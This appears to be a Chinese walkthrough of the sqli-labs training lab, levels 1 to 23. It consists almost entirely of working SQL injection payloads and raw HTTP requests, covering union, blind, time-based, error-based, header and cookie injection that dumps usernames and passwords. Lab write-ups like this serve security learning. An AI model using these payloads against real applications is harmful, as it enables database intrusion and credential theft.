Less-1
payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第一关正规的字符型SQL注入,单引号报错,常规注入即可
Less-2
payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
第二关数字型SQL注入,直接跟payload即可,通过and 1=1 ,and 1=2发现注入点
Less-3
payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第三关为小括号包裹的字符型注入,发现注入点之后使用payload即可
Less-4
payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
第四关为小括号包裹的字符型注入
Less-5
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
布尔盲注脚本:https://www.cnblogs.com/Spec/p/10648793.html
此脚本只将数据库爆出,具体还需要自己更改。
Less-6
payload1(探测长度,以database()为例):"+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):"+and+(select+mid(database(),1,1)='s')--+
同第五关,脚本稍作更改也可使用
Less-7
payload1(探测长度,以database()为例):'))+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
时间盲注,通过if语句判断,争取则延时3秒,否则不延时。
Less-8
payload1(探测长度,以database()为例):'+and+(select+length(database())=8)--+
payload2(探测内容,以database()为例):'+and+(select+mid(database(),1,1)='s')--+
同第五关
Less-9
payload1(探测长度,以database()为例):'+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
同第七关,单引号字符型延时盲注
Less-10
payload1(探测长度,以database()为例):"+and+if((length(database())=8),sleep(3),1)--+
payload2(探测内容,以database()为例):"+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Less-11
payload:
POST /sqli-labs/Less-11/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-11/?id=1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
常规的post注入,万能密码等。
Less-12
payload:
POST /sqli-labs/Less-12/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-12/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 110 uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-13
poc:
POST /sqli-labs/Less-13/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-13/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 74 uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit
post类型的布尔盲注,密码处通过 or 来判断真假
Less-14
poc:
POST /sqli-labs/Less-14/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-14/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 67 uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit
同第十三关
Less-15
payload:
POST /sqli-labs/Less-11/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-11/?id=1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 79 uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-16
poc:
POST /sqli-labs/Less-16/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-16/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 74 uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit
Less-17
poc:
POST /sqli-labs/Less-17/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-17/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 100 uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit
报错注入,之前一直用这个payload:
select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
但一直都不对,知道读源码才知道对长度进行了限制,所以使用这个payload:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
发现报错成功。
Less-18
poc:
POST /sqli-labs/Less-18/ HTTP/1.1 Host: localhost User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or ' Accept-Language: en-US,en;q=0.5 Referer: http://localhost/sqli-labs/Less-18/ Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 34 uname=admin&passwd=0&submit=Submit
看源码发现,是将User-Agent未过滤插入数据库中,此时构造报错注入:updatexml(1,concat(0x7e,(SELECT user()),0x7e),1),从而产生sql http头注入。
Less-19
poc:
POST /sqli-labs/Less-19/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or ' Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 34 uname=admin&passwd=0&submit=Submit
同第十八关一样,不过登录进去时发现会将referer输出,于是修改referer的值,报错成功。
Less-20
poc:
GET /sqli-labs/Less-20/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: uname=admin' and 1=2 union select user(),version(),database()--+ Connection: close
cookie注入,当登录进去时,发现会将User-Anget,referer,cookie输出到页面中,然后刷新,抓包,替换cookie为payload即可。
Less-21
poc:
GET /sqli-labs/Less-21/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw== Connection: close
payload使用base64编码,并且注入点使用单引号和小括号包裹 ')
payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#
Less-22
poc:
GET /sqli-labs/Less-22/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA= Connection: close
payload:admin" and 1=2 union select 1,username,password from security.users limit 0,1--
Less-23
payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00
多次尝试基本确定 # 与 -- 是被过滤掉了的,于是尝试新的注释方法: ;%00 于是注释成功。